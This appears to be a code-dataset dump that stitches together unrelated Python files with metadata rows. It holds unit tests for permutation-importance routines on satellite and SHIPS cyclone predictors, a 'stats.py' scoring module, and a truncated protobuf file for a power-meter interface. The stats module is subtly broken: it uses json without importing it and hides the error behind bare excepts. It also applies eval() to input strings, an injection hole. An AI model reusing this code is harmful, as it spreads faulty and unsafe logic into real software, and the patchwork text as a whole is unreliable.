SECOND_PREDICTOR_NAMES = [satellite_utils.BRIGHTNESS_TEMPERATURE_KEY, 'c', 'b']
class PermutationTests(unittest.TestCase):
"""Each method is a unit test for permutation.py."""
def test_permute_values_gridded_sat_all_lags(self):
"""Ensures correct output from _permute_values.
In this case, the predictor matrix contains gridded satellite data and
permutation is over all lag times.
"""
new_predictor_matrix, permuted_value_matrix = (
permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_GRIDDED_SAT + 0.,
predictor_type_enum=0,
variable_index=0, model_lag_time_index=None,
permuted_value_matrix=None
)
)
self.assertFalse(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_GRIDDED_SAT, atol=TOLERANCE
))
newnew_predictor_matrix = permutation._permute_values(
predictor_matrix=new_predictor_matrix + 0.,
predictor_type_enum=0,
variable_index=0, model_lag_time_index=None,
permuted_value_matrix=permuted_value_matrix
)[0]
self.assertTrue(numpy.allclose(
new_predictor_matrix, newnew_predictor_matrix, atol=TOLERANCE
))
def test_permute_values_gridded_sat_one_lag(self):
"""Ensures correct output from _permute_values.
In this case, the predictor matrix contains gridded satellite data and
permutation is over one lag time only.
"""
new_predictor_matrix, permuted_value_matrix = (
permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_GRIDDED_SAT + 0.,
predictor_type_enum=0,
variable_index=0, model_lag_time_index=1,
permuted_value_matrix=None
)
)
self.assertFalse(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_GRIDDED_SAT, atol=TOLERANCE
))
num_lag_times = new_predictor_matrix.shape[-2]
indices_to_compare = numpy.arange(num_lag_times) != 1
self.assertTrue(numpy.allclose(
new_predictor_matrix[..., indices_to_compare, :],
PREDICTOR_MATRIX_GRIDDED_SAT[..., indices_to_compare, :],
atol=TOLERANCE
))
newnew_predictor_matrix = permutation._permute_values(
predictor_matrix=new_predictor_matrix + 0.,
predictor_type_enum=0,
variable_index=0, model_lag_time_index=1,
permuted_value_matrix=permuted_value_matrix
)[0]
self.assertTrue(numpy.allclose(
new_predictor_matrix, newnew_predictor_matrix, atol=TOLERANCE
))
def test_permute_values_ungridded_sat_all_lags(self):
"""Ensures correct output from _permute_values.
In this case, the predictor matrix contains ungridded satellite data and
permutation is over all lag times.
"""
new_predictor_matrix, permuted_value_matrix = (
permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_UNGRIDDED_SAT + 0.,
predictor_type_enum=1,
variable_index=0, model_lag_time_index=None,
permuted_value_matrix=None
)
)
self.assertFalse(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_UNGRIDDED_SAT, atol=TOLERANCE
))
num_variables = new_predictor_matrix.shape[-1]
indices_to_compare = numpy.arange(num_variables) != 0
self.assertTrue(numpy.allclose(
new_predictor_matrix[..., indices_to_compare],
PREDICTOR_MATRIX_UNGRIDDED_SAT[..., indices_to_compare],
atol=TOLERANCE
))
newnew_predictor_matrix = permutation._permute_values(
predictor_matrix=new_predictor_matrix + 0.,
predictor_type_enum=1,
variable_index=0, model_lag_time_index=None,
permuted_value_matrix=permuted_value_matrix
)[0]
self.assertTrue(numpy.allclose(
new_predictor_matrix, newnew_predictor_matrix, atol=TOLERANCE
))
def test_permute_values_ungridded_sat_one_lag(self):
"""Ensures correct output from _permute_values.
In this case, the predictor matrix contains ungridded satellite data and
permutation is over one lag time.
"""
new_predictor_matrix, permuted_value_matrix = (
permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_UNGRIDDED_SAT + 0.,
predictor_type_enum=1,
variable_index=0, model_lag_time_index=1,
permuted_value_matrix=None
)
)
self.assertFalse(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_UNGRIDDED_SAT, atol=TOLERANCE
))
num_variables = new_predictor_matrix.shape[-1]
second_indices = numpy.arange(num_variables) != 0
num_lag_times = new_predictor_matrix.shape[-2]
first_indices = numpy.arange(num_lag_times) != 1
self.assertTrue(numpy.allclose(
new_predictor_matrix[..., second_indices][..., first_indices, :],
PREDICTOR_MATRIX_UNGRIDDED_SAT[
..., second_indices
][..., first_indices, :],
atol=TOLERANCE
))
newnew_predictor_matrix = permutation._permute_values(
predictor_matrix=new_predictor_matrix + 0.,
predictor_type_enum=1,
variable_index=0, model_lag_time_index=1,
permuted_value_matrix=permuted_value_matrix
)[0]
self.assertTrue(numpy.allclose(
new_predictor_matrix, newnew_predictor_matrix, atol=TOLERANCE
))
def test_permute_values_ships_all_lags_lagged(self):
"""Ensures correct output from _permute_values.
In this case, the predictor matrix contains SHIPS data; permutation is
over all lag times; and a predictor with built-in lags is permuted.
"""
new_predictor_matrix, permuted_value_matrix = (
permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_SHIPS + 0.,
predictor_type_enum=2,
variable_index=0, model_metadata_dict=MODEL_METADATA_DICT,
model_lag_time_index=None, permuted_value_matrix=None
)
)
self.assertFalse(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_SHIPS, atol=TOLERANCE
))
new_lagged_matrix_4d, new_forecast_matrix_4d = (
neural_net.ships_predictors_3d_to_4d(
predictor_matrix_3d=new_predictor_matrix,
num_lagged_predictors=NUM_LAGGED_PREDICTORS,
num_builtin_lag_times=NUM_BUILTIN_SHIPS_LAG_TIMES,
num_forecast_predictors=NUM_FORECAST_PREDICTORS,
num_forecast_hours=NUM_SHIPS_FORECAST_HOURS
)
)
orig_lagged_matrix_4d, orig_forecast_matrix_4d = (
neural_net.ships_predictors_3d_to_4d(
predictor_matrix_3d=PREDICTOR_MATRIX_SHIPS,
num_lagged_predictors=NUM_LAGGED_PREDICTORS,
num_builtin_lag_times=NUM_BUILTIN_SHIPS_LAG_TIMES,
num_forecast_predictors=NUM_FORECAST_PREDICTORS,
num_forecast_hours=NUM_SHIPS_FORECAST_HOURS
)
)
self.assertTrue(numpy.allclose(
new_forecast_matrix_4d, orig_forecast_matrix_4d, atol=TOLERANCE
))
num_variables = new_lagged_matrix_4d.shape[-1]
indices_to_compare = numpy.arange(num_variables) != 0
self.assertTrue(numpy.allclose(
new_lagged_matrix_4d[..., indices_to_compare],
orig_lagged_matrix_4d[..., indices_to_compare],
atol=TOLERANCE
))
newnew_predictor_matrix = permutation._permute_values(
predictor_matrix=new_predictor_matrix + 0.,
predictor_type_enum=2,
variable_index=0, model_metadata_dict=MODEL_METADATA_DICT,
model_lag_time_index=None,
permuted_value_matrix=permuted_value_matrix
)[0]
self.assertTrue(numpy.allclose(
new_predictor_matrix, newnew_predictor_matrix, atol=TOLERANCE
))
def test_permute_values_ships_one_lag_lagged(self):
"""Ensures correct output from _permute_values.
In this case, the predictor matrix contains SHIPS data; permutation is
over one lag time; and a predictor with built-in lags is permuted.
"""
new_predictor_matrix, permuted_value_matrix = (
permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_SHIPS + 0.,
predictor_type_enum=2,
variable_index=0, model_metadata_dict=MODEL_METADATA_DICT,
model_lag_time_index=1, permuted_value_matrix=None
)
)
self.assertFalse(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_SHIPS, atol=TOLERANCE
))
new_lagged_matrix_4d, new_forecast_matrix_4d = (
neural_net.ships_predictors_3d_to_4d(
predictor_matrix_3d=new_predictor_matrix,
num_lagged_predictors=NUM_LAGGED_PREDICTORS,
num_builtin_lag_times=NUM_BUILTIN_SHIPS_LAG_TIMES,
num_forecast_predictors=NUM_FORECAST_PREDICTORS,
num_forecast_hours=NUM_SHIPS_FORECAST_HOURS
)
)
orig_lagged_matrix_4d, orig_forecast_matrix_4d = (
neural_net.ships_predictors_3d_to_4d(
predictor_matrix_3d=PREDICTOR_MATRIX_SHIPS,
num_lagged_predictors=NUM_LAGGED_PREDICTORS,
num_builtin_lag_times=NUM_BUILTIN_SHIPS_LAG_TIMES,
num_forecast_predictors=NUM_FORECAST_PREDICTORS,
num_forecast_hours=NUM_SHIPS_FORECAST_HOURS
)
)
self.assertTrue(numpy.allclose(
new_forecast_matrix_4d, orig_forecast_matrix_4d, atol=TOLERANCE
))
num_variables = new_lagged_matrix_4d.shape[-1]
second_indices = numpy.arange(num_variables) != 0
num_lag_times = new_lagged_matrix_4d.shape[-2]
first_indices = numpy.arange(num_lag_times) != 1
self.assertTrue(numpy.allclose(
new_lagged_matrix_4d[..., second_indices][..., first_indices, :],
orig_lagged_matrix_4d[..., second_indices][..., first_indices, :],
atol=TOLERANCE
))
newnew_predictor_matrix = permutation._permute_values(
predictor_matrix=new_predictor_matrix + 0.,
predictor_type_enum=2,
variable_index=0, model_metadata_dict=MODEL_METADATA_DICT,
model_lag_time_index=1,
permuted_value_matrix=permuted_value_matrix
)[0]
self.assertTrue(numpy.allclose(
new_predictor_matrix, newnew_predictor_matrix, atol=TOLERANCE
))
def test_permute_values_ships_all_lags_forecast(self):
"""Ensures correct output from _permute_values.
In this case, the predictor matrix contains SHIPS data; permutation is
over all lag times; and a predictor with built-in forecast hours is
permuted.
"""
new_predictor_matrix, permuted_value_matrix = (
permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_SHIPS + 0.,
predictor_type_enum=2,
variable_index=NUM_LAGGED_PREDICTORS,
model_metadata_dict=MODEL_METADATA_DICT,
model_lag_time_index=None, permuted_value_matrix=None
)
)
self.assertFalse(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_SHIPS, atol=TOLERANCE
))
new_lagged_matrix_4d, new_forecast_matrix_4d = (
neural_net.ships_predictors_3d_to_4d(
predictor_matrix_3d=new_predictor_matrix,
num_lagged_predictors=NUM_LAGGED_PREDICTORS,
num_builtin_lag_times=NUM_BUILTIN_SHIPS_LAG_TIMES,
num_forecast_predictors=NUM_FORECAST_PREDICTORS,
num_forecast_hours=NUM_SHIPS_FORECAST_HOURS
)
)
orig_lagged_matrix_4d, orig_forecast_matrix_4d = (
neural_net.ships_predictors_3d_to_4d(
predictor_matrix_3d=PREDICTOR_MATRIX_SHIPS,
num_lagged_predictors=NUM_LAGGED_PREDICTORS,
num_builtin_lag_times=NUM_BUILTIN_SHIPS_LAG_TIMES,
num_forecast_predictors=NUM_FORECAST_PREDICTORS,
num_forecast_hours=NUM_SHIPS_FORECAST_HOURS
)
)
self.assertTrue(numpy.allclose(
new_lagged_matrix_4d, orig_lagged_matrix_4d, atol=TOLERANCE
))
num_variables = new_forecast_matrix_4d.shape[-1]
indices_to_compare = numpy.arange(num_variables) != 0
self.assertTrue(numpy.allclose(
new_forecast_matrix_4d[..., indices_to_compare],
orig_forecast_matrix_4d[..., indices_to_compare],
atol=TOLERANCE
))
newnew_predictor_matrix = permutation._permute_values(
predictor_matrix=new_predictor_matrix + 0.,
predictor_type_enum=2,
variable_index=NUM_LAGGED_PREDICTORS,
model_metadata_dict=MODEL_METADATA_DICT,
model_lag_time_index=None,
permuted_value_matrix=permuted_value_matrix
)[0]
self.assertTrue(numpy.allclose(
new_predictor_matrix, newnew_predictor_matrix, atol=TOLERANCE
))
def test_permute_values_ships_one_lag_forecast(self):
"""Ensures correct output from _permute_values.
In this case, the predictor matrix contains SHIPS data; permutation is
over one lag time; and a predictor with built-in forecast hours is
permuted.
"""
new_predictor_matrix, permuted_value_matrix = (
permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_SHIPS + 0.,
predictor_type_enum=2,
variable_index=NUM_LAGGED_PREDICTORS,
model_metadata_dict=MODEL_METADATA_DICT,
model_lag_time_index=1, permuted_value_matrix=None
)
)
self.assertFalse(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_SHIPS, atol=TOLERANCE
))
new_lagged_matrix_4d, new_forecast_matrix_4d = (
neural_net.ships_predictors_3d_to_4d(
predictor_matrix_3d=new_predictor_matrix,
num_lagged_predictors=NUM_LAGGED_PREDICTORS,
num_builtin_lag_times=NUM_BUILTIN_SHIPS_LAG_TIMES,
num_forecast_predictors=NUM_FORECAST_PREDICTORS,
num_forecast_hours=NUM_SHIPS_FORECAST_HOURS
)
)
orig_lagged_matrix_4d, orig_forecast_matrix_4d = (
neural_net.ships_predictors_3d_to_4d(
predictor_matrix_3d=PREDICTOR_MATRIX_SHIPS,
num_lagged_predictors=NUM_LAGGED_PREDICTORS,
num_builtin_lag_times=NUM_BUILTIN_SHIPS_LAG_TIMES,
num_forecast_predictors=NUM_FORECAST_PREDICTORS,
num_forecast_hours=NUM_SHIPS_FORECAST_HOURS
)
)
self.assertTrue(numpy.allclose(
new_lagged_matrix_4d, orig_lagged_matrix_4d, atol=TOLERANCE
))
num_variables = new_forecast_matrix_4d.shape[-1]
second_indices = numpy.arange(num_variables) != 0
num_lag_times = new_forecast_matrix_4d.shape[-2]
first_indices = numpy.arange(num_lag_times) != 1
self.assertTrue(numpy.allclose(
new_forecast_matrix_4d[..., second_indices][..., first_indices, :],
orig_forecast_matrix_4d[..., second_indices][..., first_indices, :],
atol=TOLERANCE
))
newnew_predictor_matrix = permutation._permute_values(
predictor_matrix=new_predictor_matrix + 0.,
predictor_type_enum=2,
variable_index=NUM_LAGGED_PREDICTORS,
model_metadata_dict=MODEL_METADATA_DICT,
model_lag_time_index=1,
permuted_value_matrix=permuted_value_matrix
)[0]
self.assertTrue(numpy.allclose(
new_predictor_matrix, newnew_predictor_matrix, atol=TOLERANCE
))
def test_depermute_values_gridded_sat_all_lags(self):
"""Ensures correct output from _depermute_values.
In this case, the predictor matrix contains gridded satellite data and
permutation is over all lag times.
"""
new_predictor_matrix = permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_GRIDDED_SAT + 0.,
predictor_type_enum=0,
variable_index=0, model_lag_time_index=None,
permuted_value_matrix=None
)[0]
new_predictor_matrix = permutation._depermute_values(
predictor_matrix=new_predictor_matrix,
clean_predictor_matrix=PREDICTOR_MATRIX_GRIDDED_SAT,
predictor_type_enum=0,
variable_index=0, model_lag_time_index=None
)
self.assertTrue(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_GRIDDED_SAT, atol=TOLERANCE
))
def test_depermute_values_gridded_sat_one_lag(self):
"""Ensures correct output from _depermute_values.
In this case, the predictor matrix contains gridded satellite data and
permutation is over one lag time.
"""
new_predictor_matrix = permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_GRIDDED_SAT + 0.,
predictor_type_enum=0,
variable_index=0, model_lag_time_index=1,
permuted_value_matrix=None
)[0]
new_predictor_matrix = permutation._depermute_values(
predictor_matrix=new_predictor_matrix,
clean_predictor_matrix=PREDICTOR_MATRIX_GRIDDED_SAT,
predictor_type_enum=0,
variable_index=0, model_lag_time_index=1
)
self.assertTrue(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_GRIDDED_SAT, atol=TOLERANCE
))
def test_depermute_values_ungridded_sat_all_lags(self):
"""Ensures correct output from _depermute_values.
In this case, the predictor matrix contains ungridded satellite data and
permutation is over all lag times.
"""
new_predictor_matrix = permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_UNGRIDDED_SAT + 0.,
predictor_type_enum=1,
variable_index=0, model_lag_time_index=None,
permuted_value_matrix=None
)[0]
new_predictor_matrix = permutation._depermute_values(
predictor_matrix=new_predictor_matrix,
clean_predictor_matrix=PREDICTOR_MATRIX_UNGRIDDED_SAT,
predictor_type_enum=1,
variable_index=0, model_lag_time_index=None
)
self.assertTrue(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_UNGRIDDED_SAT, atol=TOLERANCE
))
def test_depermute_values_ungridded_sat_one_lag(self):
"""Ensures correct output from _depermute_values.
In this case, the predictor matrix contains ungridded satellite data and
permutation is over one lag time.
"""
new_predictor_matrix = permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_UNGRIDDED_SAT + 0.,
predictor_type_enum=1,
variable_index=0, model_lag_time_index=1,
permuted_value_matrix=None
)[0]
new_predictor_matrix = permutation._depermute_values(
predictor_matrix=new_predictor_matrix,
clean_predictor_matrix=PREDICTOR_MATRIX_UNGRIDDED_SAT,
predictor_type_enum=1,
variable_index=0, model_lag_time_index=1
)
self.assertTrue(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_UNGRIDDED_SAT, atol=TOLERANCE
))
def test_depermute_values_ships_all_lags_lagged(self):
"""Ensures correct output from _depermute_values.
In this case, the predictor matrix contains SHIPS data; permutation is
over all lag times; and a predictor with built-in lags is permuted.
"""
new_predictor_matrix = permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_SHIPS + 0.,
predictor_type_enum=2,
variable_index=0, model_metadata_dict=MODEL_METADATA_DICT,
model_lag_time_index=None, permuted_value_matrix=None
)[0]
new_predictor_matrix = permutation._depermute_values(
predictor_matrix=new_predictor_matrix,
clean_predictor_matrix=PREDICTOR_MATRIX_SHIPS,
predictor_type_enum=2,
variable_index=0, model_metadata_dict=MODEL_METADATA_DICT,
model_lag_time_index=None
)
self.assertTrue(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_SHIPS, atol=TOLERANCE
))
def test_depermute_values_ships_one_lag_lagged(self):
"""Ensures correct output from _depermute_values.
In this case, the predictor matrix contains SHIPS data; permutation is
over one lag time; and a predictor with built-in lags is permuted.
"""
new_predictor_matrix = permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_SHIPS + 0.,
predictor_type_enum=2,
variable_index=0, model_metadata_dict=MODEL_METADATA_DICT,
model_lag_time_index=1, permuted_value_matrix=None
)[0]
new_predictor_matrix = permutation._depermute_values(
predictor_matrix=new_predictor_matrix,
clean_predictor_matrix=PREDICTOR_MATRIX_SHIPS,
predictor_type_enum=2,
variable_index=0, model_metadata_dict=MODEL_METADATA_DICT,
model_lag_time_index=1
)
self.assertTrue(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_SHIPS, atol=TOLERANCE
))
def test_depermute_values_ships_all_lags_forecast(self):
"""Ensures correct output from _depermute_values.
In this case, the predictor matrix contains SHIPS data; permutation is
over all lag times; and a predictor with built-in forecast hours is
permuted.
"""
new_predictor_matrix = permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_SHIPS + 0.,
predictor_type_enum=2,
variable_index=NUM_LAGGED_PREDICTORS,
model_metadata_dict=MODEL_METADATA_DICT,
model_lag_time_index=None, permuted_value_matrix=None
)[0]
new_predictor_matrix = permutation._depermute_values(
predictor_matrix=new_predictor_matrix,
clean_predictor_matrix=PREDICTOR_MATRIX_SHIPS,
predictor_type_enum=2,
variable_index=NUM_LAGGED_PREDICTORS,
model_metadata_dict=MODEL_METADATA_DICT,
model_lag_time_index=None
)
self.assertTrue(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_SHIPS, atol=TOLERANCE
))
def test_depermute_values_ships_one_lag_forecast(self):
"""Ensures correct output from _depermute_values.
In this case, the predictor matrix contains SHIPS data; permutation is
over one lag time; and a predictor with built-in forecast hours is
permuted.
"""
new_predictor_matrix = permutation._permute_values(
predictor_matrix=PREDICTOR_MATRIX_SHIPS + 0.,
predictor_type_enum=2,
variable_index=NUM_LAGGED_PREDICTORS,
model_metadata_dict=MODEL_METADATA_DICT,
model_lag_time_index=1, permuted_value_matrix=None
)[0]
new_predictor_matrix = permutation._depermute_values(
predictor_matrix=new_predictor_matrix,
clean_predictor_matrix=PREDICTOR_MATRIX_SHIPS,
predictor_type_enum=2,
variable_index=NUM_LAGGED_PREDICTORS,
model_metadata_dict=MODEL_METADATA_DICT,
model_lag_time_index=1
)
self.assertTrue(numpy.allclose(
new_predictor_matrix, PREDICTOR_MATRIX_SHIPS, atol=TOLERANCE
))
def test_predictor_indices_to_metadata_first(self):
"""Ensures correct output from _predictor_indices_to_metadata.
In this case, using first set of results.
"""
these_predictor_names = permutation._predictor_indices_to_metadata(
model_metadata_dict=MODEL_METADATA_DICT,
one_step_result_dict=FIRST_RESULT_DICT
)
self.assertTrue(these_predictor_names == FIRST_PREDICTOR_NAMES)
def test_predictor_indices_to_metadata_second(self):
"""Ensures correct output from _predictor_indices_to_metadata.
In this case, using first set of results.
"""
these_predictor_names = permutation._predictor_indices_to_metadata(
model_metadata_dict=MODEL_METADATA_DICT,
one_step_result_dict=SECOND_RESULT_DICT
)
self.assertTrue(these_predictor_names == SECOND_PREDICTOR_NAMES)
if __name__ == '__main__':
unittest.main()
| 37.911234
| 80
| 0.672459
| 3,087
| 27,334
| 5.483965
| 0.044704
| 0.181641
| 0.079745
| 0.070884
| 0.944297
| 0.938567
| 0.926458
| 0.913108
| 0.899817
| 0.897868
| 0
| 0.012392
| 0.264872
| 27,334
| 720
| 81
| 37.963889
| 0.830099
| 0.116851
| 0
| 0.757396
| 0
| 0
| 0.000636
| 0
| 0
| 0
| 0
| 0
| 0.072978
| 1
| 0.035503
| false
| 0
| 0.009862
| 0
| 0.047337
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8f74b2c6975850311018737bd1e518ede8c16aab
| 2,912
|
py
|
Python
|
valence/scripts/feature_extraction/stats.py
|
gizemsogancioglu/elderly-emotion-SC
|
b8f371e0df6e4aa8b680d59995cd18d52f591466
|
[
"MIT"
] | 2
|
2020-08-05T11:44:30.000Z
|
2021-02-19T15:46:10.000Z
|
valence/scripts/feature_extraction/stats.py
|
gizemsogancioglu/elderly-emotion-SC
|
b8f371e0df6e4aa8b680d59995cd18d52f591466
|
[
"MIT"
] | null | null | null |
valence/scripts/feature_extraction/stats.py
|
gizemsogancioglu/elderly-emotion-SC
|
b8f371e0df6e4aa8b680d59995cd18d52f591466
|
[
"MIT"
] | 2
|
2020-08-31T02:42:15.000Z
|
2020-10-29T15:39:48.000Z
|
import pandas as pd
import numpy as np
def calc_min_from_list(score_list):
df = pd.DataFrame(eval(score_list), columns=['word', 'pos', 'score'])
return df['score'].min()
def calc_max_from_list(score_list):
df = pd.DataFrame(eval(score_list), columns=['word', 'pos', 'score'])
return df['score'].max()
def calc_mean_from_list(score_list):
df = pd.DataFrame(eval(score_list), columns=['word', 'pos', 'score'])
return df['score'].mean()
def calc_sum_from_list(score_list):
df = pd.DataFrame(eval(score_list), columns=['word', 'pos', 'score'])
return df['score'].sum()
def calc_num_from_list(score_list):
return len(eval(score_list))
def calc_num_pos_from_list(score_list):
df = pd.DataFrame(eval(score_list), columns=['word', 'pos', 'score'])
df = df[df['score'] > 0]
return len(df)
def calc_num_neg_from_list(score_list):
df = pd.DataFrame(eval(score_list), columns=['word', 'pos', 'score'])
df = df[df['score'] < 0]
return len(df)
def calc_range_from_list(score_list):
df = pd.DataFrame(eval(score_list), columns=['word', 'pos', 'score'])
max_val = df['score'].max()
min_val = df['score'].min()
return max_val - min_val
def calc_sum_from_dict(score_dict):
try:
score_dict = json.loads(score_dict.replace('\'', '\"'))
except:
pass
total_sum = 0
if score_dict:
for k in score_dict.keys():
total_sum += score_dict[k]
return total_sum
else:
return np.nan
def calc_min_from_dict(score_dict):
try:
score_dict = json.loads(score_dict.replace('\'', '\"'))
except:
pass
if score_dict:
return np.min(list(score_dict.values()))
else:
return np.nan
def calc_max_from_dict(score_dict):
try:
score_dict = json.loads(score_dict.replace('\'', '\"'))
except:
pass
if score_dict:
return np.max(list(score_dict.values()))
else:
return np.nan
def calc_range_from_dict(score_dict):
try:
score_dict = json.loads(score_dict.replace('\'', '\"'))
except:
pass
if score_dict:
values = list(score_dict.values())
return np.max(values) - np.min(values)
else:
return np.nan
def calc_mean_from_dict(score_dict):
try:
score_dict = json.loads(score_dict.replace('\'', '\"'))
except:
pass
if score_dict:
return np.mean(list(score_dict.values()))
else:
return np.nan
def calc_num_neg_from_dict(score_dict):
try:
score_dict = json.loads(score_dict.replace('\'', '\"'))
except:
pass
count = 0
if score_dict:
for val in score_dict.values():
if val < 0:
count += 1
return count
else:
return np.nan
def calc_num_pos_from_dict(score_dict):
try:
score_dict = json.loads(score_dict.replace('\'', '\"'))
except:
pass
count = 0
if score_dict:
for val in score_dict.values():
if val > 0:
count += 1
return count
else:
return np.nan
| 19.945205
| 71
| 0.645261
| 438
| 2,912
| 4.043379
| 0.105023
| 0.182947
| 0.058724
| 0.076793
| 0.815359
| 0.792772
| 0.78035
| 0.757199
| 0.757199
| 0.757199
| 0
| 0.003863
| 0.199863
| 2,912
| 145
| 72
| 20.082759
| 0.756223
| 0
| 0
| 0.634615
| 0
| 0
| 0.052403
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.144231
| false
| 0.067308
| 0.019231
| 0.009615
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
8f7cdc57728d17d24e6648a81187f53e42054688
| 60,183
|
py
|
Python
|
instrosetta/interfaces/light_analysis/power_meter_pb2.py
|
jmosbacher/instrosetta-python
|
b323ee4d3db0b7d8e22ec731dac521c967e5323d
|
[
"MIT"
] | null | null | null |
instrosetta/interfaces/light_analysis/power_meter_pb2.py
|
jmosbacher/instrosetta-python
|
b323ee4d3db0b7d8e22ec731dac521c967e5323d
|
[
"MIT"
] | null | null | null |
instrosetta/interfaces/light_analysis/power_meter_pb2.py
|
jmosbacher/instrosetta-python
|
b323ee4d3db0b7d8e22ec731dac521c967e5323d
|
[
"MIT"
] | null | null | null |
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: instrosetta/interfaces/light_analysis/power_meter.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='instrosetta/interfaces/light_analysis/power_meter.proto',
package='instrosetta.interfaces.light_analysis.power_meter.v1',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n7instrosetta/interfaces/light_analysis/power_meter.proto\x12\x34instrosetta.interfaces.light_analysis.power_meter.v1\"\xc1\x01\n\x11InitializeRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12k\n\nproperties\x18\x02 \x03(\x0b\x32W.instrosetta.interfaces.light_analysis.power_meter.v1.InitializeRequest.PropertiesEntry\x1a\x31\n\x0fPropertiesEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"3\n\x12InitializeResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0f\n\x07success\x18\x02 \x01(\x08\"\x1f\n\x0fShutdownRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\"1\n\x10ShutdownResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0f\n\x07success\x18\x02 \x01(\x08\".\n\x0fGetPowerRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\r\n\x05units\x18\x02 \x01(\t\"B\n\x10GetPowerResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"A\n\x0fSetPowerRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"B\n\x10SetPowerResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\".\n\x0fGetCountRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\r\n\x05units\x18\x02 \x01(\t\"B\n\x10GetCountResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"A\n\x0fSetCountRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"B\n\x10SetCountResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"3\n\x14GetWavelengthRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\r\n\x05units\x18\x02 \x01(\t\"G\n\x15GetWavelengthResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"F\n\x14SetWavelengthRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"G\n\x15SetWavelengthResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"-\n\x0eGetModeRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\r\n\x05units\x18\x02 \x01(\t\"A\n\x0fGetModeResponse\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"@\n\x0eSetModeRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x11\n\tmagnitude\x18\x02 \x01(\x01\x12\r\n\x05units\x18\x03 \x01(\t\"A\n\x0fSetModeResponse\x12\x0c\n\x04name\x18\x01 